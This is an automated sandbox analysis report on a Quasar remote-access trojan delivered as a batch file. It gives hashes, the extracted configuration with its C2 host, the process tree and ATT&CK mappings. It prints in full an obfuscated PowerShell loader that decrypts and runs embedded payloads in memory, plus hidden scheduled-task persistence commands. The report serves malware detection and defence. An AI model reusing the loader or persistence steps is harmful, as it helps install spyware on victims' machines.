quasar | 745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

General

Target

Uni.bat
Size

1.8MB
MD5

14516087f9549022d5582272910428b1
SHA1

53324370839fa1c07bfa42cf7cb3039513805d42
SHA256

745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512

cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
SSDEEP

24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

SLAVE

C2

uk2.localto.net:39077

Mutex

cc0a2b76-665e-4e16-b318-5ee02270fbcd

Attributes

encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
install_name
UpdateHost.exe
log_directory
Error Logs
reconnect_delay
3000
startup_key
WOS64
subdirectory
Windows

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3600-52-0x000001BCA91F0000-0x000001BCA9514000-memory.dmp	family_quasar

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 1 IoCs

Processes:

UpdateHost.exe

pid process

440 UpdateHost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1440 schtasks.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
440	UpdateHost.exe

pid	process
1440	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exeUpdateHost.exe

pid	process
4528	powershell.exe
4528	powershell.exe
4120	powershell.exe
4120	powershell.exe
3600	powershell.exe
3600	powershell.exe
440	UpdateHost.exe
440	UpdateHost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeIncreaseQuotaPrivilege	4120	powershell.exe
Token: SeSecurityPrivilege	4120	powershell.exe
Token: SeTakeOwnershipPrivilege	4120	powershell.exe
Token: SeLoadDriverPrivilege	4120	powershell.exe
Token: SeSystemProfilePrivilege	4120	powershell.exe
Token: SeSystemtimePrivilege	4120	powershell.exe
Token: SeProfSingleProcessPrivilege	4120	powershell.exe
Token: SeIncBasePriorityPrivilege	4120	powershell.exe
Token: SeCreatePagefilePrivilege	4120	powershell.exe
Token: SeBackupPrivilege	4120	powershell.exe
Token: SeRestorePrivilege	4120	powershell.exe
Token: SeShutdownPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeSystemEnvironmentPrivilege	4120	powershell.exe
Token: SeRemoteShutdownPrivilege	4120	powershell.exe
Token: SeUndockPrivilege	4120	powershell.exe
Token: SeManageVolumePrivilege	4120	powershell.exe
Token: 33	4120	powershell.exe
Token: 34	4120	powershell.exe
Token: 35	4120	powershell.exe
Token: 36	4120	powershell.exe
Token: SeIncreaseQuotaPrivilege	4120	powershell.exe
Token: SeSecurityPrivilege	4120	powershell.exe
Token: SeTakeOwnershipPrivilege	4120	powershell.exe
Token: SeLoadDriverPrivilege	4120	powershell.exe
Token: SeSystemProfilePrivilege	4120	powershell.exe
Token: SeSystemtimePrivilege	4120	powershell.exe
Token: SeProfSingleProcessPrivilege	4120	powershell.exe
Token: SeIncBasePriorityPrivilege	4120	powershell.exe
Token: SeCreatePagefilePrivilege	4120	powershell.exe
Token: SeBackupPrivilege	4120	powershell.exe
Token: SeRestorePrivilege	4120	powershell.exe
Token: SeShutdownPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeSystemEnvironmentPrivilege	4120	powershell.exe
Token: SeRemoteShutdownPrivilege	4120	powershell.exe
Token: SeUndockPrivilege	4120	powershell.exe
Token: SeManageVolumePrivilege	4120	powershell.exe
Token: 33	4120	powershell.exe
Token: 34	4120	powershell.exe
Token: 35	4120	powershell.exe
Token: 36	4120	powershell.exe
Token: SeIncreaseQuotaPrivilege	4120	powershell.exe
Token: SeSecurityPrivilege	4120	powershell.exe
Token: SeTakeOwnershipPrivilege	4120	powershell.exe
Token: SeLoadDriverPrivilege	4120	powershell.exe
Token: SeSystemProfilePrivilege	4120	powershell.exe
Token: SeSystemtimePrivilege	4120	powershell.exe
Token: SeProfSingleProcessPrivilege	4120	powershell.exe
Token: SeIncBasePriorityPrivilege	4120	powershell.exe
Token: SeCreatePagefilePrivilege	4120	powershell.exe
Token: SeBackupPrivilege	4120	powershell.exe
Token: SeRestorePrivilege	4120	powershell.exe
Token: SeShutdownPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeSystemEnvironmentPrivilege	4120	powershell.exe
Token: SeRemoteShutdownPrivilege	4120	powershell.exe
Token: SeUndockPrivilege	4120	powershell.exe
Token: SeManageVolumePrivilege	4120	powershell.exe
Token: 33	4120	powershell.exe
Token: 34	4120	powershell.exe
Token: 35	4120	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 1216 wrote to memory of 4528	1216	cmd.exe	powershell.exe
PID 1216 wrote to memory of 4528	1216	cmd.exe	powershell.exe
PID 4528 wrote to memory of 4120	4528	powershell.exe	powershell.exe
PID 4528 wrote to memory of 4120	4528	powershell.exe	powershell.exe
PID 4528 wrote to memory of 4988	4528	powershell.exe	WScript.exe
PID 4528 wrote to memory of 4988	4528	powershell.exe	WScript.exe
PID 4988 wrote to memory of 3648	4988	WScript.exe	cmd.exe
PID 4988 wrote to memory of 3648	4988	WScript.exe	cmd.exe
PID 3648 wrote to memory of 3600	3648	cmd.exe	powershell.exe
PID 3648 wrote to memory of 3600	3648	cmd.exe	powershell.exe
PID 3600 wrote to memory of 1440	3600	powershell.exe	schtasks.exe
PID 3600 wrote to memory of 1440	3600	powershell.exe	schtasks.exe
PID 3600 wrote to memory of 440	3600	powershell.exe	UpdateHost.exe
PID 3600 wrote to memory of 440	3600	powershell.exe	UpdateHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_187_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_187.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_187.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_187.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_187.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_187.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1440

C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:440

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ee6f5f5e5924783870aeedeccdafe9da

SHA1
0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

SHA256
ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

SHA512
998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfqo0j1f.0i5.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_187.bat
Filesize
1.8MB

MD5
14516087f9549022d5582272910428b1

SHA1
53324370839fa1c07bfa42cf7cb3039513805d42

SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_187.vbs
Filesize
115B

MD5
9464289340f6a8d3c247e0be8974b90f

SHA1
976b9e3c071a56260286a02c893e03d5930e33ac

SHA256
542afaf3fcca2ab637c5fd367b86194176d86959253ce18f0da7343e9425fafe

SHA512
f4df3974dfec6e0725d96ada90d5805829f06a95a93883041b56283a1353a67faafb06afdd061aeecf2a759cc32313bc134fa85338d1c567f38f6b21e04692c5

Download Submit
memory/440-70-0x00000173AE440000-0x00000173AE450000-memory.dmp

Filesize
64KB

Download
memory/440-78-0x00000173AE440000-0x00000173AE450000-memory.dmp

Filesize
64KB

Download
memory/440-77-0x00000173AE440000-0x00000173AE450000-memory.dmp

Filesize
64KB

Download
memory/440-76-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/440-73-0x00000173C9080000-0x00000173C90F6000-memory.dmp

Filesize
472KB

Download
memory/440-72-0x00000173C8FB0000-0x00000173C8FF4000-memory.dmp

Filesize
272KB

Download
memory/440-71-0x00000173AE440000-0x00000173AE450000-memory.dmp

Filesize
64KB

Download
memory/440-69-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/3600-50-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmp

Filesize
64KB

Download
memory/3600-74-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/3600-51-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmp

Filesize
64KB

Download
memory/3600-48-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/3600-52-0x000001BCA91F0000-0x000001BCA9514000-memory.dmp

Filesize
3.1MB

Download
memory/3600-53-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmp

Filesize
64KB

Download
memory/4120-30-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/4120-27-0x0000026C3F950000-0x0000026C3F960000-memory.dmp

Filesize
64KB

Download
memory/4120-26-0x0000026C3F950000-0x0000026C3F960000-memory.dmp

Filesize
64KB

Download
memory/4120-25-0x0000026C3F950000-0x0000026C3F960000-memory.dmp

Filesize
64KB

Download
memory/4120-24-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/4528-54-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/4528-10-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmp

Filesize
10.8MB

Download
memory/4528-5-0x00000228A5E00000-0x00000228A5E22000-memory.dmp

Filesize
136KB

Download
memory/4528-11-0x00000228A3D50000-0x00000228A3D60000-memory.dmp

Filesize
64KB

Download
memory/4528-12-0x00000228A5DF0000-0x00000228A5DF8000-memory.dmp

Filesize
32KB

Download
memory/4528-13-0x00000228A6090000-0x00000228A61E8000-memory.dmp

Filesize
1.3MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads